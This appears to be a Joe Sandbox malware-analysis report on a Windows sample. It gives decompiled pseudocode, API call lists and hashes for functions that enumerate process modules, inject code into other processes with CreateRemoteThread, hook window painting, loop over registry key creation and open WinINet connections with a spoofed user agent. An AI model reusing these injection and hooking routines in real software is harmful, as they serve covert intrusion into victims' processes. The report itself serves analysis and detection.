0x012b4e0b
0x012b4e04
0x012b4e04
0x012b4e04
0x012b4e12
0x00000000
0x00000000
0x012b4e28
0x012b4e2c
0x00000000
0x00000000
0x012b4e2e
0x00000000
0x012b4e2c
0x012b4e33
0x012b4e33
0x012b4e36
0x012b4e38
0x012b4e38
0x012b4e3d
0x012b4e44

APIs

PathIsRelativeW.SHLWAPI ref: 012B4D8F
EnumProcessModules.PSAPI(?,?,00000004,?), ref: 012B4DB0
EnumProcessModules.PSAPI(?,00000000,?,?,?,?,?,00000004,?), ref: 012B4DE0
GetModuleBaseNameW.PSAPI(?,00000000,?,00000104,?,00000000,?,?,?,?,?,00000004,?), ref: 012B4E04
GetModuleFileNameExW.PSAPI(?,00000000,?,00000104,?,00000000,?,?,?,?,?,00000004,?), ref: 012B4E0B
lstrcmpiW.KERNEL32(?,?,?,00000000,?,00000104,?,00000000,?,?,?,?,?,00000004,?), ref: 012B4E1E

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: EnumModuleModulesNameProcess$BaseFilePathRelativelstrcmpi
String ID:
API String ID: 1505091101-0
Opcode ID: bf223ca9cda1d975733d32d5fbb7b0e01a36fde1d90ddcb7ea133a7621e1a699
Instruction ID: 32c491ff5e7d67c2d72244e0a441a2dee842ef3249fb75f4d4c67d3fd2613fd2
Opcode Fuzzy Hash: bf223ca9cda1d975733d32d5fbb7b0e01a36fde1d90ddcb7ea133a7621e1a699
Instruction Fuzzy Hash: C7217C7191015AFBDF22EBA8D8C4DFEBBB9FF04384F044065A602A6101D7309A51DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012B95C0 Relevance: 9.1, APIs: 6, Instructions: 72
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E012B95C0(WCHAR* __ecx, void** __edx, long _a4) {
				intOrPtr _v8;
				long _v12;
				void* _t19;
				void* _t20;
				long _t22;
				void* _t23;
				void** _t35;

				_push(__ecx);
				_push(__ecx);
				asm("sbb eax, eax");
				_t35 = __edx;
				_t19 = CreateFileW(__ecx, 0x80000000,  ~(_a4 & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				_t35[2] = _t19;
				if(_t19 == 0xffffffff) {
					L11:
					_t20 = 0;
				} else {
					__imp__GetFileSizeEx(_t19,  &_v12);
					if(_t19 == 0 || _v8 != 0) {
						L10:
						CloseHandle(_t35[2]);
						goto L11;
					} else {
						_t22 = _v12;
						_t35[1] = _t22;
						if(_t22 != 0) {
							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
							 *_t35 = _t23;
							if(_t23 == 0) {
								goto L10;
							} else {
								if(ReadFile(_t35[2], _t23, _t35[1],  &_a4, 0) == 0 || _a4 != _t35[1]) {
									VirtualFree( *_t35, 0, 0x8000);
									goto L10;
								} else {
									goto L5;
								}
							}
						} else {
							 *_t35 = 0;
							L5:
							_t20 = 1;
						}
					}
				}
				return _t20;
			}

0x012b95c3
0x012b95c4
0x012b95d7
0x012b95e7
0x012b95e9
0x012b95ef
0x012b95f5
0x012b9665
0x012b9665
0x012b95f7
0x012b95fc
0x012b9604
0x012b965c
0x012b965f
0x00000000
0x012b960b
0x012b960b
0x012b960e
0x012b9613
0x012b9624
0x012b962a
0x012b962e
0x00000000
0x012b9630
0x012b9644
0x012b9656
0x00000000
0x00000000
0x00000000
0x00000000
0x012b9644
0x012b9615
0x012b9615
0x012b9617
0x012b9617
0x012b9617
0x012b9613
0x012b9604
0x012b966a

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 012B95E9
GetFileSizeEx.KERNEL32(00000000,?,?,80000000,?,00000000,00000003,00000000,00000000), ref: 012B95FC
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,80000000,?,00000000,00000003,00000000,00000000), ref: 012B9624
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,80000000,?,00000000,00000003,00000000,00000000), ref: 012B963C
VirtualFree.KERNEL32(?,00000000,00008000,?,80000000,?,00000000,00000003,00000000,00000000), ref: 012B9656
CloseHandle.KERNEL32(?,?,80000000,?,00000000,00000003,00000000,00000000), ref: 012B965F

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: dff74524e6e07a6122f5dc439e4b07a7fc00342cde45a0c95d6bc4c1e797bd8e
Instruction ID: cd0379176246a204485db27721459f251a63fa216a7476c556b16dd22c85c70f
Opcode Fuzzy Hash: dff74524e6e07a6122f5dc439e4b07a7fc00342cde45a0c95d6bc4c1e797bd8e
Instruction Fuzzy Hash: 1B11BEB1520201BFEF318F29DC89EAB7FACEB85B54B10491CFB96C6194D630A580CB20

Uniqueness

Uniqueness Score: -1.00%

Function 012B7F16 Relevance: 9.1, APIs: 6, Instructions: 70
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E012B7F16(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
				int _v8;
				struct HWND__* _v12;
				long _v16;
				intOrPtr* _v20;
				long _t24;
				struct HWND__* _t32;
				intOrPtr* _t41;

				_push(_a8);
				_t41 = __edx;
				_v20 = __edx;
				_v8 = __ecx;
				_t32 = WindowFromPoint(_a4.x);
				if(_t32 != 0) {
					if(SendMessageTimeoutW(_t32, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v8,  &_v16) != 0) {
						_t24 = _v16;
						if(_t24 != 0xffffffff) {
							if(_t41 != 0) {
								 *_t41 = _t24;
							}
						} else {
							_v12 = _t32;
							SetWindowLongW(_t32, 0xfffffff0, GetWindowLongW(_t32, 0xfffffff0) | 0x08000000);
							_t32 = L012B1889(_v8, _v20, _a4, _a8);
							SetWindowLongW(_v12, 0xfffffff0, GetWindowLongW(_v12, 0xfffffff0) & 0xf7ffffff);
						}
					} else {
						_t32 = 0;
					}
				}
				return _t32;
			}

0x012b7f1e
0x012b7f21
0x012b7f26
0x012b7f29
0x012b7f32
0x012b7f36
0x012b7f63
0x012b7f69
0x012b7f6f
0x012b7fbd
0x012b7fbf
0x012b7fbf
0x012b7f71
0x012b7f7b
0x012b7f8f
0x012b7fa7
0x012b7fb6
0x012b7fb8
0x012b7f65
0x012b7f65
0x012b7f65
0x012b7f63
0x012b7fc6

APIs

WindowFromPoint.USER32(?,?), ref: 012B7F2C
SendMessageTimeoutW.USER32 ref: 012B7F5B
GetWindowLongW.USER32(00000000,000000F0), ref: 012B7F7E
SetWindowLongW.USER32 ref: 012B7F8F
GetWindowLongW.USER32(?,000000F0), ref: 012B7FA9
SetWindowLongW.USER32 ref: 012B7FB6

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Window$Long$FromMessagePointSendTimeout
String ID:
API String ID: 2645164282-0
Opcode ID: b91d5f36271ab47d8f50afea684ff81361e525fa4d9a6725a970ad18d00bb245
Instruction ID: e2f340574a9ac095aa3d2727582653f254d8e5f8e39e0e70fadfa7cdeec0d47c
Opcode Fuzzy Hash: b91d5f36271ab47d8f50afea684ff81361e525fa4d9a6725a970ad18d00bb245
Instruction Fuzzy Hash: 3811B471910219BBEF105FA8DC84EAD7B79EB44370F204725FA61A32D4D770D910CB94

Uniqueness

Uniqueness Score: -1.00%

Function 012C2ED8 Relevance: 9.1, APIs: 6, Instructions: 55
synchronizationthreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E012C2ED8(void* __ecx, long _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				void* _t11;
				void* _t15;
				void* _t26;
				void* _t29;

				_push(__ecx);
				_v5 = 0;
				_t29 = OpenProcess(0x47a, 0, _a4);
				_t31 = _t29;
				if(_t29 != 0) {
					_t11 = L012B1A05(_t29, _a8, _t31, _a12);
					_t26 = _t11;
					if(_t26 != 0) {
						_t15 = CreateRemoteThread(_t29, 0, 0, _t11 -  *0x12dc74c + E012B17DF, 0, 0, 0);
						_a4 = _t15;
						if(_t15 == 0) {
							VirtualFreeEx(_t29, _t26, 0, 0x8000);
						} else {
							WaitForSingleObject(_t15, 0x2710);
							CloseHandle(_a4);
							_v5 = 1;
						}
					}
					CloseHandle(_t29);
				}
				return _v5;
			}

0x012c2edb
0x012c2ee9
0x012c2ef2
0x012c2ef4
0x012c2ef6
0x012c2f01
0x012c2f06
0x012c2f0a
0x012c2f1e
0x012c2f24
0x012c2f29
0x012c2f4e
0x012c2f2b
0x012c2f31
0x012c2f3a
0x012c2f40
0x012c2f40
0x012c2f29
0x012c2f55
0x012c2f5b
0x012c2f62

APIs

OpenProcess.KERNEL32(0000047A,00000000,?), ref: 012C2EEC
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0258DF2B,00000000,00000000,00000000), ref: 012C2F1E
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 012C2F31
CloseHandle.KERNEL32(?), ref: 012C2F3A
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 012C2F4E
CloseHandle.KERNEL32(00000000,?), ref: 012C2F55

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
String ID:
API String ID: 14861764-0
Opcode ID: bff87e2e0a40af36539c11fe6aeef91cc86801a416c1b259d70726f9e4e1def5
Instruction ID: 8d9a4b824321777e319f287c8e69a46ec8c51e662b4b61ace20472679a1aa853
Opcode Fuzzy Hash: bff87e2e0a40af36539c11fe6aeef91cc86801a416c1b259d70726f9e4e1def5
Instruction Fuzzy Hash: EB01B5B2505299BFEB211FA8ECCCDAF3F6CEB49694B054028FB069A144CF754D1A8771

Uniqueness

Uniqueness Score: -1.00%

Function 012CE43A Relevance: 9.1, APIs: 6, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E012CE43A(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
				void* _t21;
				int _t22;
				signed int _t23;
				struct HWND__* _t27;
				char* _t31;

				_t27 = _a4;
				if(( *0x12dc738 & 0x00000004) == 0 || L012B150A() == 0) {
					L7:
					return GetUpdateRgn(_t27, _a8, _a12);
				} else {
					_t31 = TlsGetValue( *0x12dd83c);
					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
						goto L7;
					} else {
						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
						if(_a12 != 0) {
							_t22 = SaveDC( *(_t31 + 8));
							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
							RestoreDC( *(_t31 + 8), _t22);
						}
						 *_t31 = 1;
						_t21 = 2;
						return _t21;
					}
				}
			}

0x012ce445
0x012ce449
0x012ce4bb
0x00000000
0x012ce454
0x012ce460
0x012ce464
0x00000000
0x012ce46b
0x012ce47a
0x012ce484
0x012ce48a
0x012ce49a
0x012ce4a2
0x012ce4a9
0x012ce4ac
0x012ce4b2
0x012ce4b5
0x012ce4b8
0x00000000
0x012ce4b8
0x012ce464

APIs

TlsGetValue.KERNEL32 ref: 012CE45A
SetRectRgn.GDI32(?,?,?,?,?), ref: 012CE47A
SaveDC.GDI32(?), ref: 012CE48A
SendMessageW.USER32(?,00000014,?,00000000), ref: 012CE49A
RestoreDC.GDI32(?,00000000), ref: 012CE4AC
GetUpdateRgn.USER32 ref: 012CE4C2

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: MessageRectRestoreSaveSendUpdateValue
String ID:
API String ID: 1426479601-0
Opcode ID: f40d702fc8b80c03f2e14e6b63ce9b32d1f015a6239acf283744abfbc9f073dd
Instruction ID: 1decc5c0f85a246f8ab582f2a3dcf7ce95d53ab8898e8b5910717a17057cd55f
Opcode Fuzzy Hash: f40d702fc8b80c03f2e14e6b63ce9b32d1f015a6239acf283744abfbc9f073dd
Instruction Fuzzy Hash: 60119A31401B05EFDB325F64FC4CE9ABFA5FB08B11F018A08FB96860A4C332A050DB60

Uniqueness

Uniqueness Score: -1.00%

Function 012CE4CE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012CE4CE(void* __esi) {
				char _v20;
				char* _v80;
				char _v88;
				char _v188;
				char _v708;
				void* _t15;
				void* _t28;
				void* _t41;
				void** _t44;
				void* _t46;

				_t46 = __esi;
				_t15 =  *(__esi + 0x180);
				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
					_t44 = _t46 + 0x17c;
					L012B11D1(_t44);
					L012B15E6(1,  &_v708);
					L012B137F(0x2937498d,  &_v188, 0);
					_t41 = 0x44;
					L012B19F6( &_v88, _t41);
					_v88 = 0x44;
					_v80 =  &_v188;
					ResetEvent( *(_t46 + 0xc));
					if(L012B166D( &_v708, 0x12d9f8c, 0,  &_v88,  &_v20) != 0) {
						L012B1947(_t44,  &_v20, 0x10);
						if(WaitForSingleObject( *(_t46 + 0xc), 0x3e8) == 0) {
							goto L6;
						} else {
							TerminateProcess( *_t44, 0);
							L012B11D1(_t44);
							goto L3;
						}
					} else {
						L3:
						_t28 = 0;
					}
				} else {
					L6:
					_t28 = 1;
				}
				return _t28;
			}

0x012ce4ce
0x012ce4d1
0x012ce4e0
0x012ce4f6
0x012ce4fe
0x012ce50c
0x012ce51e
0x012ce525
0x012ce529
0x012ce537
0x012ce53e
0x012ce541
0x012ce563
0x012ce570
0x012ce585
0x00000000
0x012ce587
0x012ce58b
0x012ce593
0x00000000
0x012ce593
0x012ce565
0x012ce565
0x012ce565
0x012ce565
0x012ce59a
0x012ce59a
0x012ce59a
0x012ce59a
0x012ce59e

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 012CE4E5
ResetEvent.KERNEL32(?,00000000), ref: 012CE541
WaitForSingleObject.KERNEL32(?,000003E8,?,?,00000010,00000000,00000044,?), ref: 012CE57D
TerminateProcess.KERNEL32(?,00000000), ref: 012CE58B

Strings

D, xrefs: 012CE537

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: ObjectSingleWait$EventProcessResetTerminate
String ID: D
API String ID: 882540868-2746444292
Opcode ID: dd5ebb5095eeb4fe140bd1b8e31410605b53394aa18712389297f485c45b7f9c
Instruction ID: e66b6c48fe271063a17024d44d9e6372ec75ec1ed054303dc1261669cd6755d2
Opcode Fuzzy Hash: dd5ebb5095eeb4fe140bd1b8e31410605b53394aa18712389297f485c45b7f9c
Instruction Fuzzy Hash: DE11DA31A103069BEB31EB64EC85FFE7B7DAF64740F004519D606A6184EF74A915CB11

Uniqueness

Uniqueness Score: -1.00%

Function 012B7E3D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B7E3D(intOrPtr __ecx, void* __edx, int _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v5;
				void* _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;

				_v16 = __ecx;
				_v5 = 0;
				if(RegCreateKeyExW(__edx, _a4, 0, 0, 0, 4, 0,  &_v12, 0) == 0) {
					_a4 = 0;
					do {
						L012B1028(_v16, _a8, _a12, _a16);
						if(RegCreateKeyExW(_v12, _a8, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
							goto L4;
						} else {
							RegCloseKey(_v20);
							if(_v24 == 1) {
								_v5 = 1;
							} else {
								goto L4;
							}
						}
						L7:
						RegCloseKey(_v12);
						goto L8;
						L4:
						_a4 =  &(_a4[0]);
					} while (_a4 < 0x64);
					goto L7;
				}
				L8:
				return _v5;
			}

0x012b7e5b
0x012b7e5f
0x012b7e66
0x012b7e6f
0x012b7e72
0x012b7e7e
0x012b7e9b
0x00000000
0x012b7e9d
0x012b7ea0
0x012b7ea6
0x012b7eb3
0x00000000
0x00000000
0x00000000
0x012b7ea6
0x012b7eb7
0x012b7eba
0x00000000
0x012b7ea8
0x012b7ea8
0x012b7eab
0x00000000
0x012b7eb1
0x012b7ebd
0x012b7ec3

APIs

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 012B7E62
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 012B7E97
RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 012B7EA0
RegCloseKey.ADVAPI32(00000064,?,?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 012B7EBA

Strings

d, xrefs: 012B7EAB

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CloseCreate
String ID: d
API String ID: 2932200918-2564639436
Opcode ID: c08a123b4c86ec7fcc1aeeea88a7c51a8a0f1f9abac1d1720c21f02f0ded9823
Instruction ID: de46e0c353a241ad88cf536f130e14abcf9c56f5f9bcf8375eac4faad0b4cb94
Opcode Fuzzy Hash: c08a123b4c86ec7fcc1aeeea88a7c51a8a0f1f9abac1d1720c21f02f0ded9823
Instruction Fuzzy Hash: 50110AB591020DBEEB029F94DC80DEFBFBDEF54288F004066FA1166251D2719E159BB1

Uniqueness

Uniqueness Score: -1.00%

Function 012B5093 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52
networkCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E012B5093(char* __ecx, char* __edx, short _a4, signed int _a8) {
				char* _v8;
				void* _t11;
				void* _t16;
				char* _t18;
				void* _t24;

				_t18 = __ecx;
				_push(__ecx);
				_v8 = __edx;
				if(__ecx == 0) {
					_t18 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
				}
				_t16 = InternetOpenA(_t18,  !_a8 & 0x00000001, 0, 0, 0);
				if(_t16 == 0) {
					L7:
					_t11 = 0;
				} else {
					_t24 = 0;
					do {
						_t3 = _t24 + 0x12db00c; // 0x12db00c
						_t4 = _t24 + 0x12db008; // 0x2
						InternetSetOptionA(_t16,  *_t4, _t3, 4);
						_t24 = _t24 + 8;
					} while (_t24 < 0x18);
					_t11 = InternetConnectA(_t16, _v8, _a4, 0, 0, 3, 0, 0);
					if(_t11 == 0) {
						InternetCloseHandle(_t16);
						goto L7;
					}
				}
				return _t11;
			}

0x012b5093
0x012b5096
0x012b509b
0x012b50a0
0x012b50a2
0x012b50a2
0x012b50ba
0x012b50be
0x012b5100
0x012b5100
0x012b50c0
0x012b50c1
0x012b50c3
0x012b50c5
0x012b50cc
0x012b50d3
0x012b50d9
0x012b50dc
0x012b50ee
0x012b50f7
0x012b50fa
0x00000000
0x012b50fa
0x012b50f7
0x012b5105

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 012B50B4
InternetSetOptionA.WININET(00000000,00000002,012DB00C,00000004), ref: 012B50D3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 012B50EE
InternetCloseHandle.WININET(00000000), ref: 012B50FA

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 012B50A2

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpenOption
String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
API String ID: 910987326-3737944857
Opcode ID: 43ad3495a45fa91e734522a28fd8c89776861c1392d9eced6fca8f8b9320ab4e
Instruction ID: 3c9330c3b0ee9c45ed667912ebc99f8115c6698fd96062a3d144261d603ecbdc
Opcode Fuzzy Hash: 43ad3495a45fa91e734522a28fd8c89776861c1392d9eced6fca8f8b9320ab4e
Instruction Fuzzy Hash: 3A01D172520201BFE7329A66EC8CDAB7AAEEBCA7507144408FA26D6041C231C90187B4

Uniqueness

Uniqueness Score: -1.00%

Function 012BBD98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E012BBD98(signed int __edx) {
				char _v8;
				struct HINSTANCE__* _v12;
				char _v1036;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t15;
				char _t20;
				signed int _t24;
				void* _t29;

				_t24 = __edx;
				_t20 = 0;
				_t13 = LoadLibraryA("urlmon.dll");
				_v12 = _t13;
				if(_t13 != 0) {
					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
					if(_t15 != 0) {
						_push( &_v8);
						_push( &_v1036);
						_push(0);
						_v8 = 0x3ff;
						_v1036 = 0;
						if( *_t15() == 0) {
							if(_v8 > 0x3ff) {
								_v8 = 0x3ff;
							}
							 *((char*)(_t29 + _v8 - 0x408)) = _t20;
							_t20 = L012B12A8( &_v1036, _t24 | 0xffffffff);
						}
					}
					FreeLibrary(_v12);
				}
				return _t20;
			}

0x012bbd98
0x012bbda7
0x012bbda9
0x012bbdaf
0x012bbdb4
0x012bbdbc
0x012bbdc4
0x012bbdca
0x012bbdd1
0x012bbdd7
0x012bbdd8
0x012bbddb
0x012bbde5
0x012bbdea
0x012bbdec
0x012bbdec
0x012bbdfb
0x012bbe07
0x012bbe07
0x012bbe09
0x012bbe0d
0x012bbe0d
0x012bbe17

APIs

LoadLibraryA.KERNEL32(urlmon.dll), ref: 012BBDA9
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 012BBDBC
FreeLibrary.KERNEL32(?), ref: 012BBE0D

Strings

ObtainUserAgentString, xrefs: 012BBDB6
urlmon.dll, xrefs: 012BBDA2

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
